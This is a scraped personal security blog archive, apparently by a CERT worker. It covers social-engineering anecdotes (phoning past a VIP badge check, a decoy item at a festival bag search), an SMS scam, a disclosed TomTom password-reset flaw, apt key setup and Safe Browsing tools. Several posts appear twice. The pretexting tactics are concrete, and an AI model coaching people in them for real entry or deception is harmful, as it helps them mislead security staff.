Yesterday there was this big commercial vendor security event in Belgium with a VIP area. I was offered VIP entrance tickets but at the time offered I wasn't even sure I wanted to go and now I had regular tickets.
The thing was thus that a number of people I knew were VIP and I wanted access to the area were I was not supposed to come.
The first time I stopped at the lady checking the badges with my phone next to my ear, totally ignoring her and having a conversation with somebody who was actually inside. It was funny because I was describing the area loudly like "I see this banner, and to the left that poster and ... ok now I see you" and just walked right in like I belonged there without getting challenged.
The second time I wanted a different approach and got challenged. I showed my badge, she said I couldn't enter I asked why not so she had the feeling she was doing her job. Then I said, I really needed to talk to my colleague and pointed at a guy who was going to sit down. He was actually my colleague but I could have pointed at anybody just far away enough to make sure she couldn't leave her desk. Since she was alone, she had no way of going to check my story. She said ok, but I couldn't have any drinks or snacks ... sure, I said I needed a chat with that guy, no drinks, no snack.
One of the guys going in with me, piggy backed on my excuse and did not even have to speak a word, he just smiled.
Yes, we did this for fun and giggles but social engineering is daily used by bad people.
Friday, March 28, 2014
Sunday, March 9, 2014
SMS Scam
Hello,
I want to tell you about a scam I received last Friday on my phone. I got during the evening a text message which was a nice piece of Social Engineering. The text message said "Appelle moi urgent 0010664112011".
The text was in French, a language spoken in my social circle, so I could have been tempted to call back. It is a classic in Belgium that people without any calling credit can send you a message that looks similar to this. This is for a lot of youngsters the way they communicate with their parents over the phone since they are most of the time out of credit.
The form that it is written in is interesting too. "Appelle moi" means "call me" so that is an instruction and if you would still hesitate it says that it is urgent and thus trying to take away any resistance. It uses the feeling of guilt that we have if we don't help somebody in need.
When I researched the number online it was immediately obvious that I was not the only one and there are number of variations. The best illustration of this is anruf-info.de. They collected some data which is interesting. If you look at the 7th, the evening I got the message there are quite a lot of Belgians reporting it, when a time stamp is given it was in the evening, just like mine. This could be an indication of some form of automatization. As we can see the day after on the 8th the scam just goes on.
Unfortunately I don't have any knowledge about how to trace the origin of this number but it would be very interesting.
I want to tell you about a scam I received last Friday on my phone. I got during the evening a text message which was a nice piece of Social Engineering. The text message said "Appelle moi urgent 0010664112011".
The text was in French, a language spoken in my social circle, so I could have been tempted to call back. It is a classic in Belgium that people without any calling credit can send you a message that looks similar to this. This is for a lot of youngsters the way they communicate with their parents over the phone since they are most of the time out of credit.
The form that it is written in is interesting too. "Appelle moi" means "call me" so that is an instruction and if you would still hesitate it says that it is urgent and thus trying to take away any resistance. It uses the feeling of guilt that we have if we don't help somebody in need.
When I researched the number online it was immediately obvious that I was not the only one and there are number of variations. The best illustration of this is anruf-info.de. They collected some data which is interesting. If you look at the 7th, the evening I got the message there are quite a lot of Belgians reporting it, when a time stamp is given it was in the evening, just like mine. This could be an indication of some form of automatization. As we can see the day after on the 8th the scam just goes on.
Unfortunately I don't have any knowledge about how to trace the origin of this number but it would be very interesting.
Thursday, December 12, 2013
Tomtom password reset issue.
I reported on the 6th of June 2013 an issue at Tomtom's website. It was something that I discovered by accident because I was helping out a family member who had forgotten his password. I waited until now to publicly disclose it because I wanted to give Tomtom the opportunity to fix it.
The Tomtom application that was installed on my family member's computer allowed my family member to trigger a password reset (by entering the e-mail address coupled to the account). My family member opened his mailbox and had a new e-mail from Tomtom with the password reset.
I got distracted in the process by the cat (cats are masters in social engineering) and asked to reset it a second time. In the inbox of my family member were thus 2 e-mails coming from the reset service. My family isn't into computers and thus when I asked to click the the link, they clicked on the first mail they saw, which was the eldest one. The reset worked and my family was happy, not realizing that this e-mail wasn't suppose to trigger the reset since there was a newer request for the reset.
The link in the e-mail looks like this:
http://www.tomtom.com/myTomTom/password_reminder_confirm.php?frm_email=familymember@mail.com&frm_check=f4357e2fa574a1764edcf077eaaf95dd
As you can see the format of the link is quite basic, an e-mail address and a hash.
On my way home I was going over the situation and asked my family member if I could get a copy of the e-mails to make sure if I didn't misinterpret something. I wondered if I could make a password reset now that the password was already reset.
I just clicked the link (no proxies in between) and did a reset of the password by using the form. Thus basically anybody who had that link could reset the password. What exact information you can find and how valuable the information is something I considered out of scope.
Since I work for CERT.be, I am familiar with the responsible disclosure guide of NCSC. The first problem I had was finding out who I had to contact at Tomtom. No information on their website, but I was lucky, the whois contact worked.
In CC of my e-mail to Tomtom I had put the NCSC (The CERT of The Netherlands) and CERT.be. The reason why is simply to have a cover-my-ass strategy. Tomtom is a company in The Netherlands and well I am a Belgian citizen that is why I chose to put both national CERT teams in copy. I do not want to get in trouble for discovering a problem, I just want it to get it fixed.
I got a reply from Tomtom on the 14th of June 2013. First of all they thanked me, they would look into the problem and promised me to keep me informed. The sad truth is that this last promise wasn't kept. I don't know if the reason why I never got a reply is that I was truthful about the fact I would write this blog entry about it.
The Tomtom application that was installed on my family member's computer allowed my family member to trigger a password reset (by entering the e-mail address coupled to the account). My family member opened his mailbox and had a new e-mail from Tomtom with the password reset.
I got distracted in the process by the cat (cats are masters in social engineering) and asked to reset it a second time. In the inbox of my family member were thus 2 e-mails coming from the reset service. My family isn't into computers and thus when I asked to click the the link, they clicked on the first mail they saw, which was the eldest one. The reset worked and my family was happy, not realizing that this e-mail wasn't suppose to trigger the reset since there was a newer request for the reset.
The link in the e-mail looks like this:
http://www.tomtom.com/myTomTom/password_reminder_confirm.php?frm_email=familymember@mail.com&frm_check=f4357e2fa574a1764edcf077eaaf95dd
As you can see the format of the link is quite basic, an e-mail address and a hash.
On my way home I was going over the situation and asked my family member if I could get a copy of the e-mails to make sure if I didn't misinterpret something. I wondered if I could make a password reset now that the password was already reset.
I just clicked the link (no proxies in between) and did a reset of the password by using the form. Thus basically anybody who had that link could reset the password. What exact information you can find and how valuable the information is something I considered out of scope.
Since I work for CERT.be, I am familiar with the responsible disclosure guide of NCSC. The first problem I had was finding out who I had to contact at Tomtom. No information on their website, but I was lucky, the whois contact worked.
In CC of my e-mail to Tomtom I had put the NCSC (The CERT of The Netherlands) and CERT.be. The reason why is simply to have a cover-my-ass strategy. Tomtom is a company in The Netherlands and well I am a Belgian citizen that is why I chose to put both national CERT teams in copy. I do not want to get in trouble for discovering a problem, I just want it to get it fixed.
I got a reply from Tomtom on the 14th of June 2013. First of all they thanked me, they would look into the problem and promised me to keep me informed. The sad truth is that this last promise wasn't kept. I don't know if the reason why I never got a reply is that I was truthful about the fact I would write this blog entry about it.
Monday, October 7, 2013
Adding repositories to your sources.list
Tonight I added a repo to my sources.list but when I ran update I got an error message telling me my system could not trust the content since the GPG key was unknown. If you are regularly confronted with this you will probably know how to handle this but I have been install quite a lot of Linux for people that are totally new to Linux so I am going to use my blog for posting the solution.
When you run the apt-get update it will tell you which key the system isn't sure about. This value will be needed.
1. The first step is to get a copy of the key on your system. I found the following example online to illustrate this: gpg --keyserver pgpkeys.mit.edu --recv-key AED4B06F473041FA
This basically means get a copy of key AED4B06F473041FA from the key server at MIT. MIT is not the only key server in the world but it is a very popular one.
2. Now that the key is on your system you need to add it to apt's key ring:
gpg -a --export AED4B06F473041FA | sudo apt-key add -
Now that the key is known to apt you can run apt-get update again and will not get any errors for that key (may be others, but you got to repeat the procedure). Remember only to add sources that you trust.
When you run the apt-get update it will tell you which key the system isn't sure about. This value will be needed.
1. The first step is to get a copy of the key on your system. I found the following example online to illustrate this: gpg --keyserver pgpkeys.mit.edu --recv-key AED4B06F473041FA
This basically means get a copy of key AED4B06F473041FA from the key server at MIT. MIT is not the only key server in the world but it is a very popular one.
2. Now that the key is on your system you need to add it to apt's key ring:
gpg -a --export AED4B06F473041FA | sudo apt-key add -
Now that the key is known to apt you can run apt-get update again and will not get any errors for that key (may be others, but you got to repeat the procedure). Remember only to add sources that you trust.
Tuesday, August 27, 2013
Fun with Google Safe Browsing
You probably have encountered it, you want to go to a website and you get a red page to say that something is wrong with the site and malware has been found on it.
Google Safe Browsing is part of your standard Mozilla Firefox and Google Chrome browser. Google isn't the only one playing this game. Microsoft has its SmartScreen filter and most major AV-solutions have something similar.
This is all fun but what if you are interested as a website owner if you have been flagged? Well actually you can get this report. If you surf to http://www.google.com/safebrowsing/diagnostic?site= you get a nice overview of what was detected for that website.
An example:
http://www.google.com/safebrowsing/diagnostic?site=google.com
It tells me that for the domain google.com in the last 90 days 903341 pages got tested:
Google Safe Browsing is part of your standard Mozilla Firefox and Google Chrome browser. Google isn't the only one playing this game. Microsoft has its SmartScreen filter and most major AV-solutions have something similar.
This is all fun but what if you are interested as a website owner if you have been flagged? Well actually you can get this report. If you surf to http://www.google.com/safebrowsing/diagnostic?site=
An example:
http://www.google.com/safebrowsing/diagnostic?site=google.com
It tells me that for the domain google.com in the last 90 days 903341 pages got tested:
- 484 drive-by-downloads
- 252 trojans
- 103 exploits
- 46 scripting exploits
So as you see this has some value in risk management. Personally I use this technique for information gathering when doing incident handling. You can use it in a risk management to monitor your own website and those of who you do business with in a rather cheap way.
Another cool little trick is that you can get more information on an Autonomous System (AS).
If you are the owner of the AS, like my current employer is the owner of the Belnet AS with the number 2611, Google has a nice little tool to generate alerts for your incident handlers
Some of us don't own AS systems. Thus I want to share with you one last toy for website owners. Enter "Fetch Like Google. "Fetch like Google" allows you to fetch up to 500 URLs a week for the sites you own and can be very handy to figure out if the Googlebot still sees your website as infected.
More info can be found at https://support.google.com/webmasters/answer/158587?hl=en.
Some people have trouble with https but I haven't had that experience personally. I found on this video on youtube which Google's answer to people having trouble. Basically it works for Google too.
Monday, August 19, 2013
Playing with Social Engineering at a music festival
It is summer in the Northern hemisphere of planet earth and this means that we have music festivals. Traditionally at the festival area you have two checkpoints, one for the entrance bracelet and one to inspect the backpacks for drinks.
The funny part is that people smuggle in drinks because it is kind of a challenge. My theory was if the man that would check my backpack would find something he would be happy and stop looking through the rest of my backpack.
I packed my bag with 2 glass bottles of Belgian beer, put them inside my sweater and put all the rest of my bicycle gear in my backpack. The thing I had planted for the man to discover was a deodorant spray. When you just pad the backpack it feels kind of like a can of coke when you are unexperienced.
I stood in the queue and when it was my turn, I presented the backpack and opened it cooperatively. I showed that I had my gear like my helmet and everything what you need to bike in a city, and the guy started padding the backpack. He found the deodorant and he asked me immediately what it was. Instead of answering him I opened up the backpack showed him the spray and he was happy with the answer.
I gave him a frame of "the guy on his bike" so the big backpack made sense.
As expected the man had a flow in his mind:
1. look into the bag, when no bottle visible goto 2 otherwise confiscate bottle
2. pad the bag, when nothing let through, when something ask question
The security problem was clearly in this last part, he knew he had to confront me with the fact that he had found something but when he was given an explanation that was different from "shit, bottle found". He was happy because he had the positive feeling he had done his job.
For your information, my friends and I still buy our beers at the festivals, but as I said before it is kind of a challenge to see if you can beat the system.
The funny part is that people smuggle in drinks because it is kind of a challenge. My theory was if the man that would check my backpack would find something he would be happy and stop looking through the rest of my backpack.
I packed my bag with 2 glass bottles of Belgian beer, put them inside my sweater and put all the rest of my bicycle gear in my backpack. The thing I had planted for the man to discover was a deodorant spray. When you just pad the backpack it feels kind of like a can of coke when you are unexperienced.
I stood in the queue and when it was my turn, I presented the backpack and opened it cooperatively. I showed that I had my gear like my helmet and everything what you need to bike in a city, and the guy started padding the backpack. He found the deodorant and he asked me immediately what it was. Instead of answering him I opened up the backpack showed him the spray and he was happy with the answer.
I gave him a frame of "the guy on his bike" so the big backpack made sense.
As expected the man had a flow in his mind:
1. look into the bag, when no bottle visible goto 2 otherwise confiscate bottle
2. pad the bag, when nothing let through, when something ask question
The security problem was clearly in this last part, he knew he had to confront me with the fact that he had found something but when he was given an explanation that was different from "shit, bottle found". He was happy because he had the positive feeling he had done his job.
For your information, my friends and I still buy our beers at the festivals, but as I said before it is kind of a challenge to see if you can beat the system.
Monday, August 12, 2013
Inverse diff - repeated malicious javascript code
I was looking into some pages for malicious javascript and needed to figure out between all the instances we found online how many where basically the same malicious code and how many were unique.
If you have been playing with linux for a while you will probably have run into diff, a nice little command to figure out the differences between files. So what I actually needed is the opposite of the "classic" diff. After a little search online I found the syntax
diff --unchanged-group-format=%= --new-group-format= --old-group-format= file1 file2
To make this a bit visual:
file1 contains:
123
abc
def
999
file2 contains:
123
def
ddd
lalala
and the output will be:
123
def
If you have been playing with linux for a while you will probably have run into diff, a nice little command to figure out the differences between files. So what I actually needed is the opposite of the "classic" diff. After a little search online I found the syntax
diff --unchanged-group-format=%= --new-group-format= --old-group-format= file1 file2
To make this a bit visual:
file1 contains:
123
abc
def
999
file2 contains:
123
def
ddd
lalala
and the output will be:
123
def
Subscribe to:
Posts (Atom)